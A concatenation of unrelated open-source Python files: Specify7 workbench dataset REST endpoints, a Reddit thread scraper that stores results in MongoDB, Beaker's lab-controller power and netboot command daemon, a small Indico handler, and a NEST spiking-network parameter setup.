"$ref": "#/components/schemas/wb_uploadresult"
},
"uploaderstatus": {
"$ref": "#/components/schemas/wb_uploaderstatus"
},
"importedfilename": {
"type": "string",
"description": "The name of the original file",
},
"remarks": {
"type": "string",
},
"timestampcreated": {
"type": "string",
"format": "datetime",
"example": "2021-04-28T13:16:07.774"
},
"timestampmodified": {
"type": "string",
"format": "datetime",
"example": "2021-04-28T13:50:41.710",
}
},
'required': ['id', 'name', 'columns', 'visualorder', 'rows', 'uploadplan', 'uploadresult',
'uploaderstatus', 'importedfilename', 'remarks', 'timestampcreated', 'timestampmodified'],
'additionalProperties': False
}
}
}
}
}
},
'put': {
"requestBody": {
"required": True,
"description": "A JSON representation of updates to the data set",
"content": {
"application/json": {
"schema": {
"type": "object",
"properties": {
"name": {
"type": "string",
"description": "Data Set name",
},
"remarks": {
"type": "string",
},
"visualorder": {
"$ref": "#/components/schemas/wb_visualorder"
},
"uploadplan": {
"$ref": "#/components/schemas/wb_uploadplan"
},
},
'additionalProperties': False
}
}
}
},
"responses": {
"204": {"description": "Data set updated."},
"409": {"description": "Dataset in use by uploader."}
}
},
"delete": {
"responses": {
"204": {"description": "Data set deleted."},
"409": {"description": "Dataset in use by uploader"}
}
}
}, components=open_api_components)
@login_maybe_required
@apply_access_control
@require_http_methods(["GET", "PUT", "DELETE"])
@transaction.atomic
def dataset(request, ds_id: str) -> http.HttpResponse:
"""RESTful endpoint for dataset <ds_id>. Supports GET PUT and DELETE."""
try:
ds = models.Spdataset.objects.get(id=ds_id)
except ObjectDoesNotExist:
return http.HttpResponseNotFound()
if ds.specifyuser != request.specify_user:
return http.HttpResponseForbidden()
if request.method == "GET":
return http.JsonResponse(dict(
id=ds.id,
name=ds.name,
columns=ds.columns,
visualorder=ds.visualorder,
rows=ds.data,
uploadplan=ds.uploadplan and json.loads(ds.uploadplan),
uploaderstatus=ds.uploaderstatus,
uploadresult=ds.uploadresult,
rowresults=ds.rowresults and json.loads(ds.rowresults),
remarks=ds.remarks,
importedfilename=ds.importedfilename,
timestampcreated=ds.timestampcreated,
timestampmodified=ds.timestampmodified,
createdbyagent=uri_for_model('agent', ds.createdbyagent_id) if ds.createdbyagent_id is not None else None,
modifiedbyagent=uri_for_model('agent', ds.modifiedbyagent_id) if ds.modifiedbyagent_id is not None else None,
))
with transaction.atomic():
ds = models.Spdataset.objects.select_for_update().get(id=ds_id)
if request.method == "PUT":
attrs = json.load(request)
if 'name' in attrs:
ds.name = attrs['name']
if 'remarks' in attrs:
ds.remarks = attrs['remarks']
if 'visualorder' in attrs:
ds.visualorder = attrs['visualorder']
assert ds.visualorder is None or (isinstance(ds.visualorder, list) and len(ds.visualorder) == len(ds.columns))
if 'uploadplan' in attrs:
plan = attrs['uploadplan']
try:
validate(plan, upload_plan_schema.schema)
except ValidationError as e:
return http.HttpResponse(f"upload plan is invalid: {e}", status=400)
if ds.uploaderstatus != None:
return http.HttpResponse('dataset in use by uploader', status=409)
if ds.was_uploaded():
return http.HttpResponse('dataset has been uploaded. changing upload plan not allowed.', status=400)
new_cols = upload_plan_schema.parse_plan(request.specify_collection, plan).get_cols() - set(ds.columns)
if new_cols:
ncols = len(ds.columns)
ds.columns += list(new_cols)
for i, row in enumerate(ds.data):
ds.data[i] = row[:ncols] + [""]*len(new_cols) + row[ncols:]
ds.uploadplan = json.dumps(plan)
ds.rowresults = None
ds.uploadresult = None
ds.save()
return http.HttpResponse(status=204)
if request.method == "DELETE":
if ds.uploaderstatus != None:
return http.HttpResponse('dataset in use by uploader', status=409)
ds.delete()
return http.HttpResponse(status=204)
assert False, "Unexpected HTTP method"
@openapi(schema={
"get": {
"responses": {
"200": {
"description": "Successful response",
"content": {
"application/json": {
"schema": {
"type": "array",
"items": {
"type": "array",
"items": {
"type": "string",
"description": "Cell value"
}
},
"description":
"2d array of cells. NOTE: last column would contain " +
"disambiguation results as a JSON object or be an " +
"empty string"
}
}
}
}
}
},
'put': {
"requestBody": {
"required": True,
"description": "A JSON representation of a spreadsheet",
"content": {
"application/json": {
"schema": {
"type": "array",
"items": {
"type": "array",
"items": {
"type": "string",
"description": "Cell value"
}
},
"description":
"2d array of cells. NOTE: last column should contain " +
"disambiguation results as a JSON object or be an " +
"empty string"
}
}
}
},
"responses": {
"204": {"description": "Data set rows updated."},
"409": {"description": "Dataset in use by uploader"}
}
},
}, components=open_api_components)
@login_maybe_required
@apply_access_control
@require_http_methods(["GET", "PUT"])
@transaction.atomic
def rows(request, ds_id: str) -> http.HttpResponse:
"""Returns (GET) or sets (PUT) the row data for dataset <ds_id>."""
try:
ds = models.Spdataset.objects.select_for_update().get(id=ds_id)
except ObjectDoesNotExist:
return http.HttpResponseNotFound()
if ds.specifyuser != request.specify_user:
return http.HttpResponseForbidden()
if request.method == "PUT":
if ds.uploaderstatus is not None:
return http.HttpResponse('dataset in use by uploader.', status=409)
if ds.was_uploaded():
return http.HttpResponse('dataset has been uploaded. changing data not allowed.', status=400)
rows = regularize_rows(len(ds.columns), json.load(request))
ds.data = rows
ds.rowresults = None
ds.uploadresult = None
ds.modifiedbyagent = request.specify_user_agent
ds.save()
return http.HttpResponse(status=204)
else: # GET
return http.JsonResponse(ds.data, safe=False)
@openapi(schema={
'post': {
"responses": {
"200": {
"description": "Returns a GUID (job ID)",
"content": {
"text/plain": {
"schema": {
"type": "string",
"maxLength": 36,
"example": "7d34dbb2-6e57-4c4b-9546-1fe7bec1acca",
}
}
}
},
"409": {"description": "Dataset in use by uploader"}
}
},
}, components=open_api_components)
@login_maybe_required
@apply_access_control
@require_POST
def upload(request, ds_id, no_commit: bool, allow_partial: bool) -> http.HttpResponse:
"Initiates an upload or validation of dataset <ds_id>."
ds = get_object_or_404(models.Spdataset, id=ds_id)
if ds.specifyuser != request.specify_user:
return http.HttpResponseForbidden()
if request.specify_user.usertype != 'Manager' and not no_commit:
return http.HttpResponseForbidden("Only manager users may upload data sets.")
with transaction.atomic():
ds = models.Spdataset.objects.select_for_update().get(id=ds_id)
if ds.uploaderstatus is not None:
return http.HttpResponse('dataset in use by uploader.', status=409)
if ds.collection != request.specify_collection:
return http.HttpResponse('dataset belongs to a different collection.', status=400)
if ds.was_uploaded():
return http.HttpResponse('dataset has already been uploaded.', status=400)
taskid = str(uuid4())
async_result = tasks.upload.apply_async([
request.specify_collection.id,
request.specify_user_agent.id,
ds_id,
no_commit,
allow_partial
], task_id=taskid)
ds.uploaderstatus = {
'operation': "validating" if no_commit else "uploading",
'taskid': taskid
}
ds.save(update_fields=['uploaderstatus'])
return http.JsonResponse(async_result.id, safe=False)
@openapi(schema={
'post': {
"responses": {
"200": {
"description": "Returns a GUID (job ID)",
"content": {
"text/plain": {
"schema": {
"type": "string",
"maxLength": 36,
"example": "7d34dbb2-6e57-4c4b-9546-1fe7bec1acca",
}
}
}
},
"409": {"description": "Dataset in use by uploader"}
}
},
}, components=open_api_components)
@login_maybe_required
@apply_access_control
@require_POST
def unupload(request, ds_id: int) -> http.HttpResponse:
"Initiates an unupload of dataset <ds_id>."
ds = get_object_or_404(models.Spdataset, id=ds_id)
if ds.specifyuser != request.specify_user:
return http.HttpResponseForbidden()
if request.specify_user.usertype != 'Manager':
return http.HttpResponseForbidden("Only manager users may un-upload data sets.")
with transaction.atomic():
ds = models.Spdataset.objects.select_for_update().get(id=ds_id)
if ds.uploaderstatus is not None:
return http.HttpResponse('dataset in use by uploader.', status=409)
if not ds.was_uploaded():
return http.HttpResponse('dataset has not been uploaded.', status=400)
taskid = str(uuid4())
async_result = tasks.unupload.apply_async([ds.id, request.specify_user_agent.id], task_id=taskid)
ds.uploaderstatus = {
'operation': "unuploading",
'taskid': taskid
}
ds.save(update_fields=['uploaderstatus'])
return http.JsonResponse(async_result.id, safe=False)
# @login_maybe_required
@openapi(schema={
'get': {
"responses": {
"200": {
"description": "Data fetched successfully",
"content": {
"text/plain": {
"schema": {
"$ref": "#/components/schemas/wb_uploaderstatus",
}
}
}
},
}
},
}, components=open_api_components)
@require_GET
def status(request, ds_id: int) -> http.HttpResponse:
"Returns the uploader status for the dataset <ds_id>."
ds = get_object_or_404(models.Spdataset, id=ds_id)
# if (wb.specifyuser != request.specify_user):
# return http.HttpResponseForbidden()
if ds.uploaderstatus is None:
return http.JsonResponse(None, safe=False)
task = {
'uploading': tasks.upload,
'validating': tasks.upload,
'unuploading': tasks.unupload,
}[ds.uploaderstatus['operation']]
result = task.AsyncResult(ds.uploaderstatus['taskid'])
status = {
'uploaderstatus': ds.uploaderstatus,
'taskstatus': result.state,
'taskinfo': result.info if isinstance(result.info, dict) else repr(result.info)
}
return http.JsonResponse(status)
@openapi(schema={
'post': {
"responses": {
"200": {
"description": "Returns either 'ok' if a task is aborted " +
" or 'not running' if no task exists.",
"content": {
"text/plain": {
"schema": {
"type": "string",
"enum": [
"ok",
"not running"
]
}
}
}
},
"503": {
"description": "Indicates the process could not be terminated.",
"content": {
"text/plain": {
"schema": {
"type": "string",
"enum": [
'timed out waiting for requested task to terminate'
]
}
}
}
},
}
},
}, components=open_api_components)
@login_maybe_required
@apply_access_control
@require_POST
def abort(request, ds_id: int) -> http.HttpResponse:
"Aborts any ongoing uploader operation for dataset <ds_id>."
ds = get_object_or_404(models.Spdataset, id=ds_id)
if ds.specifyuser != request.specify_user:
return http.HttpResponseForbidden()
if ds.uploaderstatus is None:
return http.HttpResponse('not running', content_type='text/plain')
task = {
'uploading': tasks.upload,
'validating': tasks.upload,
'unuploading': tasks.unupload,
}[ds.uploaderstatus['operation']]
result = task.AsyncResult(ds.uploaderstatus['taskid']).revoke(terminate=True)
try:
models.Spdataset.objects.filter(id=ds_id).update(uploaderstatus=None)
except OperationalError as e:
if e.args[0] == 1205: # (1205, 'Lock wait timeout exceeded; try restarting transaction')
return http.HttpResponse(
'timed out waiting for requested task to terminate',
status=503,
content_type='text/plain'
)
else:
raise
return http.HttpResponse('ok', content_type='text/plain')
@openapi(schema={
'get': {
"responses": {
"200": {
"description": "Successful operation",
"content": {
"text/plain": {
"schema": {
"type": "array",
"items": {
"$ref": "#/components/schemas/wb_upload_results",
}
}
}
}
},
}
},
}, components=open_api_components)
@login_maybe_required
@apply_access_control
@require_GET
def upload_results(request, ds_id: int) -> http.HttpResponse:
"Returns the detailed upload/validation results if any for the dataset <ds_id>."
ds = get_object_or_404(models.Spdataset, id=ds_id)
if ds.specifyuser != request.specify_user:
return http.HttpResponseForbidden()
if ds.rowresults is None:
return http.JsonResponse(None, safe=False)
results = json.loads(ds.rowresults)
if settings.DEBUG:
from .upload.upload_results_schema import schema
validate(results, schema)
return http.JsonResponse(results, safe=False)
@openapi(schema={
'post': {
"requestBody": {
"required": True,
"description": "A row to validate",
"content": {
"application/json": {
"schema": {
"type": "array",
"items": {
"type": "string",
"description": "Cell value"
},
}
}
}
},
"responses": {
"200": {
"description": "Returns upload results for a single row.",
"content": {
"text/plain": {
"schema": {
"type": "object",
"properties": {
"results": {
"$ref": "#/components/schemas/wb_upload_results"
},
},
'required': ['results'],
'additionalProperties': False
}
}
}
},
}
},
}, components=open_api_components)
@login_maybe_required
@apply_access_control
@require_POST
def validate_row(request, ds_id: str) -> http.HttpResponse:
"Validates a single row for dataset <ds_id>. The row data is passed as POST parameters."
ds = get_object_or_404(models.Spdataset, id=ds_id)
collection = request.specify_collection
bt, upload_plan = uploader.get_ds_upload_plan(collection, ds)
row = json.loads(request.body)
ncols = len(ds.columns)
rows = regularize_rows(ncols, [row])
if not rows:
return http.JsonResponse(None, safe=False)
row = rows[0]
da = uploader.get_disambiguation_from_row(ncols, row)
result = uploader.validate_row(collection, upload_plan, request.specify_user_agent.id, dict(zip(ds.columns, row)), da)
return http.JsonResponse({'result': result.to_json()})
@openapi(schema={
'get': {
"responses": {
"200": {
"description": "Returns the upload plan schema, like defined here: " +
"https://github.com/specify/specify7/blob/19ebde3d86ef4276799feb63acec275ebde9b2f4/specifyweb/workbench/upload/upload_plan_schema.py",
"content": {
"text/plain": {
"schema": {
"type": "object",
"properties": {},
}
}
}
},
}
},
}, components=open_api_components)
@require_GET
def up_schema(request) -> http.HttpResponse:
"Returns the upload plan schema."
return http.JsonResponse(upload_plan_schema.schema)
@openapi(schema={
'post': {
"requestBody": {
"required": True,
"description": "User ID of the new owner",
"content": {
"application/x-www-form-urlencoded": {
"schema": {
"type": "object",
"properties": {
"specifyuserid": {
"type": "number",
"description": "User ID of the new owner"
},
},
'required': ['specifyuserid'],
'additionalProperties': False
}
}
}
},
"responses": {
"204": {"description": "Dataset transfer succeeded."},
}
},
}, components=open_api_components)
@login_maybe_required
@apply_access_control
@require_POST
def transfer(request, ds_id: int) -> http.HttpResponse:
"""Transfer dataset's ownership to a different user."""
if 'specifyuserid' not in request.POST:
return http.HttpResponseBadRequest("missing parameter: specifyuserid")
ds = get_object_or_404(models.Spdataset, id=ds_id)
if ds.specifyuser != request.specify_user:
return http.HttpResponseForbidden()
Specifyuser = getattr(specify_models, 'Specifyuser')
try:
ds.specifyuser = Specifyuser.objects.get(id=request.POST['specifyuserid'])
except Specifyuser.DoesNotExist:
return http.HttpResponseBadRequest("the user does not exist")
Message.objects.create(user=ds.specifyuser, content=json.dumps({
'type': 'dataset-ownership-transferred',
'previous-owner-name': request.specify_user.name,
'dataset-name': ds.name,
'dataset-id': ds_id,
}))
ds.save()
return http.HttpResponse(status=204)
| specify/specify7 | specifyweb/workbench/views.py | Python | gpl-2.0 | 37,610 |
from pymongo import MongoClient
import json
import requests
import time
from datetime import datetime
def subredditInfo(sr, limit=100, sorting="top", period="day",
user_agent="ChicagoSchool's scraper", **kwargs):
"""retrieves X (max 100) amount of stories in a subreddit
'sorting' is whether or not the sorting of the reddit should be customized or not,
if it is: Allowed passing params/queries such as t=hour, week, month, year or all"""
#query to send
parameters = {"limit": limit,}
parameters.update(kwargs)
url = "http://www.reddit.com/r/%s/%s.json?limit=%d&t=%s" % (sr, sorting, limit, period)
r = requests.get(url, headers={"user-agent": user_agent})
j = json.loads(r.text)
#return list of stories
stories = []
for story in j["data"]["children"]:
stories.append(story)
return stories
def extractContent(link, sub, limit=100, sorting="top",
user_agent="ChicagoSchool's scraper", **kwargs):
url = "http://www.reddit.com/%s.json?sort=%s&limit=%d" % (link, sorting, limit)
r = requests.get(url, headers={"user-agent": user_agent})
j = json.loads(r.text)
date = datetime.fromtimestamp(j[0]["data"]["children"][0]["data"]["created"])
db_data = {"date": date, "link": link, "subreddit": sub, "content": j}
return db_data
def dbScraper(db_n, col_n, sub_l):
"""scrapes all the threads for a subreddit and stores them in a
mongodb db"""
m_ind = 0
t_f = datetime.now()
sub_ln = len(sub_l)
client = MongoClient()
db = client[db_n]
col = db[col_n]
while True:
t_1 = datetime.now()
for i, s in enumerate(sub_l):
try:
sub_info = subredditInfo(s)
except Exception as e:
print e
time.sleep(300)
sub_info = subredditInfo(s)
time.sleep(2)
sub_info_ln = len(sub_info)
for j, l in enumerate(sub_info):
link = l["data"]["permalink"]
try:
content = extractContent(link, s)
col.insert(content)
except Exception as e:
print e
time.sleep(60)
try:
content = extractContent(link, s)
col.insert(content)
except Exception as e:
print e
time.sleep(300)
print i * 100. / sub_ln, j * 100. / sub_info_ln, m_ind, i, j, datetime.now() - t_1, datetime.now() - t_f
time.sleep(2)
# now we wait until a full day has passed since we started our search
t_diff = datetime.now() - t_1
while t_diff.days < 1:
time.sleep(60)
t_diff = datetime.now() - t_1
| lbybee/reddit_spelling_index | reddit_db_scraper.py | Python | gpl-2.0 | 2,876 |
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
import sys
import os, os.path
import errno
import logging
import time
import random
import signal
import daemon
import datetime
import pkg_resources
import subprocess
import xmlrpclib
from daemon import pidfile
from optparse import OptionParser
import gevent, gevent.hub, gevent.socket, gevent.event, gevent.monkey
from bkr.labcontroller.exceptions import ShutdownException
from bkr.log import log_to_stream, log_to_syslog
from bkr.common.helpers import SensitiveUnicode, total_seconds
from bkr.labcontroller.config import load_conf, get_conf
from bkr.labcontroller.proxy import ProxyHelper
from bkr.labcontroller import netboot
logger = logging.getLogger(__name__)
class CommandQueuePoller(ProxyHelper):
def __init__(self, *args, **kwargs):
super(CommandQueuePoller, self).__init__(*args, **kwargs)
self.commands = {} #: dict of (id -> command info) for running commands
self.greenlets = {} #: dict of (command id -> greenlet which is running it)
self.last_command_datetime = {} # Last time a command was run against a system.
def get_queued_commands(self):
try:
commands = self.hub.labcontrollers.get_queued_command_details()
except xmlrpclib.Fault as fault:
if 'Anonymous access denied' in fault.faultString:
logger.debug('Session expired, re-authenticating')
self.hub._login()
commands = self.hub.labcontrollers.get_queued_command_details()
else:
raise
for command in commands:
# The 'is not None' check is important as we do not want to
# stringify the None type
if 'power' in command and 'passwd' in command['power'] and \
command['power']['passwd'] is not None:
command['power']['passwd'] = SensitiveUnicode(command['power']['passwd'])
return commands
def get_running_command_ids(self):
try:
ids = self.hub.labcontrollers.get_running_command_ids()
except xmlrpclib.Fault as fault:
if 'Anonymous access denied' in fault.faultString:
logger.debug('Session expired, re-authenticating')
self.hub._login()
ids = self.hub.labcontrollers.get_running_command_ids()
else:
raise
return ids
def mark_command_running(self, id):
self.hub.labcontrollers.mark_command_running(id)
def mark_command_completed(self, id):
self.hub.labcontrollers.mark_command_completed(id)
def mark_command_failed(self, id, message, system_broken):
self.hub.labcontrollers.mark_command_failed(id, message, system_broken)
def mark_command_aborted(self, id, message):
self.hub.labcontrollers.mark_command_aborted(id, message)
def clear_running_commands(self, message):
self.hub.labcontrollers.clear_running_commands(message)
def clear_orphaned_commands(self):
running_command_ids = self.get_running_command_ids()
orphaned_command_ids = set(running_command_ids).difference(self.commands.keys())
for id in orphaned_command_ids:
self.mark_command_aborted(id, "Command orphaned, aborting")
def poll(self):
logger.debug('Clearing orphaned commands')
self.clear_orphaned_commands()
logger.debug('Polling for queued commands')
for command in self.get_queued_commands():
if command['id'] in self.commands:
# We've already seen it, ignore
continue
# This command has to wait for any other existing commands against the
# same system, to prevent collisions
predecessors = [self.greenlets[c['id']]
for c in self.commands.itervalues()
if c['fqdn'] == command['fqdn']]
if 'power' in command and command['power'].get('address'):
# Also wait for other commands running against the same power address
predecessors.extend(self.greenlets[c['id']]
for c in self.commands.itervalues()
if 'power' in c and c['power'].get('address')
== command['power']['address'])
self.spawn_handler(command, predecessors)
def spawn_handler(self, command, predecessors):
self.commands[command['id']] = command
greenlet = gevent.spawn(self.handle, command, predecessors)
self.greenlets[command['id']] = greenlet
def completion_callback(greenlet):
if greenlet.exception:
logger.error('Command handler %r had unhandled exception: %r',
greenlet, greenlet.exception)
del self.commands[command['id']]
del self.greenlets[command['id']]
greenlet.link(completion_callback)
def handle(self, command, predecessors):
if command.get('delay'):
# Before anything else, we need to wait for our delay period.
# Instead of just doing time.sleep we do a timed wait on
# shutting_down, so that our delay doesn't hold up the shutdown.
logger.debug('Delaying %s seconds for command %s',
command['delay'], command['id'])
if shutting_down.wait(timeout=command['delay']):
return
gevent.joinall(predecessors)
if shutting_down.is_set():
return
quiescent_period = command.get('quiescent_period')
if quiescent_period:
system_fqdn = command.get('fqdn')
last_command_finished_at = self.last_command_datetime.get(system_fqdn)
if last_command_finished_at:
# Get the difference between the time now and the number of
# seconds until we can run another command
seconds_to_wait = total_seconds((last_command_finished_at +
datetime.timedelta(seconds=quiescent_period)) -
datetime.datetime.utcnow())
else:
# Play it safe, wait for the whole period.
seconds_to_wait = quiescent_period
if seconds_to_wait > 0:
logger.debug('Entering quiescent period, delaying %s seconds for'
' command %s' % (seconds_to_wait, command['id']))
if shutting_down.wait(timeout=seconds_to_wait):
return
logger.debug('Handling command %r', command)
self.mark_command_running(command['id'])
try:
if command['action'] in (u'on', u'off', 'interrupt'):
handle_power(self.conf, command)
elif command['action'] == u'reboot':
# For backwards compatibility only. The server now splits
# reboots into 'off' followed by 'on'.
handle_power(self.conf, dict(command.items() + [('action', u'off')]))
time.sleep(5)
handle_power(self.conf, dict(command.items() + [('action', u'on')]))
elif command['action'] == u'clear_logs':
handle_clear_logs(self.conf, command)
elif command['action'] == u'configure_netboot':
handle_configure_netboot(command)
elif command['action'] == u'clear_netboot':
handle_clear_netboot(command)
else:
raise ValueError('Unrecognised action %s' % command['action'])
# XXX or should we just ignore it and leave it queued?
except netboot.ImageFetchingError as e:
logger.exception('Error processing command %s', command['id'])
# It's not the system's fault so don't mark it as broken
self.mark_command_failed(command['id'], unicode(e), False)
except Exception, e:
logger.exception('Error processing command %s', command['id'])
self.mark_command_failed(command['id'],
'%s: %s' % (e.__class__.__name__, e), True)
else:
self.mark_command_completed(command['id'])
finally:
if quiescent_period:
self.last_command_datetime[command['fqdn']] = datetime.datetime.utcnow()
logger.debug('Finished handling command %s', command['id'])
def find_power_script(power_type):
customised = '/etc/beaker/power-scripts/%s' % power_type
if os.path.exists(customised) and os.access(customised, os.X_OK):
return customised
resource = 'power-scripts/%s' % power_type
if pkg_resources.resource_exists('bkr.labcontroller', resource):
return pkg_resources.resource_filename('bkr.labcontroller', resource)
raise ValueError('Invalid power type %r' % power_type)
def build_power_env(command):
env = dict(os.environ)
env['power_address'] = (command['power'].get('address') or u'').encode('utf8')
env['power_id'] = (command['power'].get('id') or u'').encode('utf8')
env['power_user'] = (command['power'].get('user') or u'').encode('utf8')
env['power_pass'] = (command['power'].get('passwd') or u'').encode('utf8')
env['power_mode'] = command['action'].encode('utf8')
return env
def handle_clear_logs(conf, command):
console_log = os.path.join(conf['CONSOLE_LOGS'], command['fqdn'])
logger.debug('Truncating console log %s', console_log)
try:
f = open(console_log, 'r+')
except IOError, e:
if e.errno != errno.ENOENT:
raise
else:
f.truncate()
def handle_configure_netboot(command):
netboot.configure_all(command['fqdn'],
command['netboot']['arch'],
command['netboot']['distro_tree_id'],
command['netboot']['kernel_url'],
command['netboot']['initrd_url'],
command['netboot']['kernel_options'])
def handle_clear_netboot(command):
netboot.clear_all(command['fqdn'])
def handle_power(conf, command):
from bkr.labcontroller.async import MonitoredSubprocess
script = find_power_script(command['power']['type'])
env = build_power_env(command)
# We try the command up to 5 times, because some power commands
# are flakey (apparently)...
for attempt in range(1, conf['POWER_ATTEMPTS'] + 1):
if attempt > 1:
# After the first attempt fails we do a randomised exponential
# backoff in the style of Ethernet.
# Instead of just doing time.sleep we do a timed wait on
# shutting_down, so that our delay doesn't hold up the shutdown.
delay = random.uniform(attempt, 2**attempt)
logger.debug('Backing off %0.3f seconds for power command %s',
delay, command['id'])
if shutting_down.wait(timeout=delay):
break
logger.debug('Launching power script %s (attempt %s) with env %r',
script, attempt, env)
# N.B. the timeout value used here affects daemon shutdown time,
# make sure the init script is kept up to date!
p = MonitoredSubprocess([script], env=env,
stdout=subprocess.PIPE, stderr=subprocess.STDOUT,
timeout=300)
logger.debug('Waiting on power script pid %s', p.pid)
p.dead.wait()
output = p.stdout_reader.get()
if p.returncode == 0 or shutting_down.is_set():
break
if p.returncode != 0:
sanitised_output = output[:150].strip()
if command['power'].get('passwd'):
sanitised_output = sanitised_output.replace(
command['power']['passwd'], '********')
raise ValueError('Power script %s failed after %s attempts with exit status %s:\n%s'
% (script, attempt, p.returncode, sanitised_output))
# TODO submit complete stdout and stderr?
def shutdown_handler(signum, frame):
logger.info('Received signal %s, shutting down', signum)
shutting_down.set()
def main_loop(poller=None, conf=None):
global shutting_down
shutting_down = gevent.event.Event()
gevent.monkey.patch_all(thread=False)
# define custom signal handlers
signal.signal(signal.SIGINT, shutdown_handler)
signal.signal(signal.SIGTERM, shutdown_handler)
logger.debug('Copying default boot loader images')
netboot.copy_default_loader_images()
logger.debug('Clearing old running commands')
poller.clear_running_commands(u'Stale command cleared on startup')
logger.debug('Entering main provision loop')
while True:
try:
poller.poll()
except:
logger.exception('Failed to poll for queued commands')
if shutting_down.wait(timeout=conf.get('SLEEP_TIME', 20)):
gevent.hub.get_hub().join() # let running greenlets terminate
break
logger.debug('Exited main provision loop')
def main():
parser = OptionParser()
parser.add_option("-c", "--config",
help="Full path to config file to use")
parser.add_option("-f", "--foreground", default=False, action="store_true",
help="run in foreground (do not spawn a daemon)")
parser.add_option("-p", "--pid-file",
help="specify a pid file")
(opts, args) = parser.parse_args()
if opts.config:
load_conf(opts.config)
logging.getLogger().setLevel(logging.DEBUG)
conf = get_conf()
pid_file = opts.pid_file
if pid_file is None:
pid_file = conf.get("PROVISION_PID_FILE", "/var/run/beaker-lab-controller/beaker-provision.pid")
# HubProxy will try to log some stuff, even though we
# haven't configured our logging handlers yet. So we send logs to stderr
# temporarily here, and configure it again below.
log_to_stream(sys.stderr, level=logging.WARNING)
try:
poller = CommandQueuePoller(conf=conf)
except Exception, ex:
sys.stderr.write('Error starting beaker-provision: %s\n' % ex)
sys.exit(1)
if opts.foreground:
log_to_stream(sys.stderr, level=logging.DEBUG)
main_loop(poller=poller, conf=conf)
else:
# See BZ#977269
poller.close()
with daemon.DaemonContext(pidfile=pidfile.TimeoutPIDLockFile(
pid_file, acquire_timeout=0),detach_process=True):
log_to_syslog('beaker-provision')
try:
main_loop(poller=poller, conf=conf)
except Exception:
logger.exception('Unhandled exception in main_loop')
raise
if __name__ == '__main__':
main()
| jtoppins/beaker | LabController/src/bkr/labcontroller/provision.py | Python | gpl-2.0 | 14,901 |
from MaKaC.webinterface.rh import conferenceDisplay
def index(req,**params):
return conferenceDisplay.RHAbstractBook(req).process(params)
def test(req,**params):
return conferenceDisplay.RHAbstractBook(req).process(params)
| belokop-an/agenda-tools | code/htdocs/confAbstractBook.py | Python | gpl-2.0 | 233 |
__author__ = 'duarte'
import sys
from preset import *
import numpy as np
"""
spike_noise_input
- standard network setup, driven with noisy, Poissonian input
- quantify and set population state
- run with noise_driven_dynamics in computations
- debug with noise_driven_dynamics script
"""
run = 'local'
data_label = 'example3_population_noisedriven'
def build_parameters(g, nu_x):
# ##################################################################################################################
# System / Kernel Parameters
# ##################################################################################################################
system = dict(
nodes=1,
ppn=16,
mem=64000,
walltime='01-00:00:00',
queue='defqueue',
transient_time=1000.,
sim_time=500.)
kernel_pars = set_kernel_defaults(run_type=run, data_label=data_label, **system)
np.random.seed(kernel_pars['np_seed'])
# ##################################################################################################################
# Neuron, Synapse and Network Parameters
# ##################################################################################################################
N = 10000
nE = 0.8 * N
nI = 0.2 * N
dE = 1.0
dI = 0.8
# Connection probabilities
pEE = 0.1
pEI = 0.2
pIE = 0.1
pII = 0.2
# connection weights
# g = 13.5
wE = 1.2
wI = -g * wE
recurrent_synapses = dict(
connected_populations=[('E', 'E'), ('E', 'I'), ('I', 'E'), ('I', 'I')],
synapse_models=['static_synapse', 'static_synapse', 'static_synapse', 'static_synapse'],
synapse_model_parameters=[{}, {}, {}, {}],
pre_computedW=[None, None, None, None],
weights=[{'distribution': 'normal_clipped', 'mu': wE, 'sigma': 0.5 * wE, 'low': 0.0001, 'high': 10. * wE},
{'distribution': 'normal_clipped', 'mu': wI, 'sigma': np.abs(0.5 * wI), 'low': 10. * wI, 'high': 0.0001},
{'distribution': 'normal_clipped', 'mu': wE, 'sigma': 0.5 * wE, 'low': 0.0001, 'high': 10. * wE},
{'distribution': 'normal_clipped', 'mu': wI, 'sigma': np.abs(0.5 * wI), 'low': 10. * wI, 'high': 0.0001}],
delays=[{'distribution': 'normal_clipped', 'mu': dE, 'sigma': 0.5 * dE, 'low': 0.1, 'high': 10. * dE},
{'distribution': 'normal_clipped', 'mu': dI, 'sigma': 0.5 * dI, 'low': 0.1, 'high': 10. * dI},
{'distribution': 'normal_clipped', 'mu': dE, 'sigma': 0.5 * dE, 'low': 0.1, 'high': 10. * dE},
{'distribution': 'normal_clipped', 'mu': dI, 'sigma': 0.5 * dI, 'low': 0.1, 'high': 10. * dI}],
conn_specs=[{'rule': 'pairwise_bernoulli', 'p': pEE},
{'rule': 'pairwise_bernoulli', 'p': pEI},
{'rule': 'pairwise_bernoulli', 'p': pIE},
{'rule': 'pairwise_bernoulli', 'p': pII}],
syn_specs=[{}, {}, {}, {}])
neuron_pars, net_pars, connection_pars = set_network_defaults(neuron_set=1, N=N, **recurrent_synapses)
net_pars['record_analogs'] = [True, False]
multimeter = rec_device_defaults(device_type='multimeter')
multimeter.update({'record_from': ['V_m', 'g_ex', 'g_in'], 'record_n': 1})
net_pars['analog_device_pars'] = [copy_dict(multimeter, {'label': ''}), {}]
# ######################################################################################################################
# Encoding Parameters
# ######################################################################################################################
# nu_x = 20.
k_x = pEE * nE
w_in = 1.
encoding_pars = set_encoding_defaults(default_set=0)
background_noise = dict(
start=0., stop=sys.float_info.max, origin=0.,
rate=nu_x*k_x, target_population_names=['E', 'I'],
additional_parameters={
'syn_specs': {},
'models': 'static_synapse',
'model_pars': {},
'weight_dist': {'distribution': 'normal_clipped', 'mu': w_in, 'sigma': 0.5*w_in, 'low': 0.0001,
'high': 10.*w_in},
'delay_dist': 0.1})
add_background_noise(encoding_pars, background_noise)
# ##################################################################################################################
# Extra analysis parameters (specific for this experiment)
# ==================================================================================================================
analysis_pars = {
# analysis depth
'depth': 2, # 1: save only summary of data, use only fastest measures
# 2: save all data, use only fastest measures
# 3: save only summary of data, use all available measures
# 4: save all data, use all available measures
'store_activity': False, # [int] - store all population activity in the last n steps of the test
# phase; if set True the entire test phase will be stored;
'population_activity': {
'time_bin': 1., # bin width for spike counts, fano factors and correlation coefficients
'n_pairs': 500, # number of spike train pairs to consider in correlation coefficient
'tau': 20., # time constant of exponential filter (van Rossum distance)
'window_len': 100, # length of sliding time window (for time_resolved analysis)
'time_resolved': False, # perform time-resolved analysis
}
}
# ##################################################################################################################
# RETURN dictionary of Parameters dictionaries
# ==================================================================================================================
return dict([('kernel_pars', kernel_pars),
('neuron_pars', neuron_pars),
